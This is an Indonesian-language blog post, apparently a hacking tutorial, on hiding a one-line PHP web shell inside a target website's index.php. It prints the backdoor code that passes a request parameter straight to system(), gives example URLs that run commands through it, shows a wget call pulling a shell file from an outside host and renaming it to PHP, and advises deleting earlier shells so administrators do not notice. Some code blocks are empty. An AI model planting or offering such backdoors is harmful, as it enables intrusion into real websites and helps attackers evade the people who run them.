shell include file kecil

mungkin buat agan2 skalian dah biasa yang namanya c99 or r57 or devshell or fxshell , rata2 script php yang di pake di atas harus di encript ke base64 atau lainnya agar tidak terdeteksi antivirus sbgai trojan or worm dan script nya pun lumayan gede untuk kapasitas file dalam web .. jadi sangat mudah bagi admin mengetahui script yang bukan bawaan dari site itu

nah disini saya akan memberikan shell script dengan system include file seperti RFI jadi kita bisa memanggil file dari luar lewat url dan yang paling gw suka dari script ini kapasitasnya kecil banget karena hanya satu baris ajah..

dan juga bisa dikatakan hidden shell karna script ini di sisipkan ke php file aslinya website target..

contohnya gini :
http://tante-sayang.com/index.php <== perhatikan index.php

pertama kita msuk ke cpanel or apa aja yang bisa buat kita edit index.php itu lebih enak pake c99 dulu terus edit index.php nya

---------------------- exp

?>

----------------------

misalnya contoh isi dari source php index aslinya seperti diaatas maka kita menambahkan shell includenya sperti ini

--------------------- exp

?>

---------------------

tambahkan di awal codenya untuk execusi nya disave dulu terus buka di url nya seperti ini

http://tante-sayang.com/index.php?x0r=[command include]
http://tante-sayang.com/index.php?x0r=ls -al

pasti binggung kok ada kata x0r dan = ???? ya kalo di liat gitu emang bingung tapi kalo dah liat codenya pasti ngerti kok..

neh codenya :

";$cmd = ($_REQUEST['x0r']);system($cmd);echo "";die;}?>

perhatikan kata x0r di atas hehehe x0r itu sama artinya kita membuka pintu untuk pemanggilan atau request dari luar server dengan cara itu kita bisa mengetikan perintah linux misalnya uname -a , ls -al , pwd , or wget nanti file yang di minta akan automatis saved di directory default file kita itu misalnya /home/tante-sayang/public_html/[file kita disini]

masih kurang ngerti ?? gini ni

http://tante-sayang.com/index.php?x0r=wget http://priasantai.com/shell.tmp;ls -al

liat akan muncul file2 di public_html nya coba di cari ada gag shell.tmp ??

kalo ada tinggal rename aja jadi php

http://tante-sayang.com/index.php?x0r=mv shell.tmp x0r.php

nanti bukanya jadi

http://tante-sayang.com/x0r.php jadi deh dijamin admin gag bakal tau loe dah inject sitenya

setelah loe berhasil inject shell include ini sebaiknya loe hapus smw c99 or shell mu sebelumnya biar enak heehehe...


0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)
=======================================================================================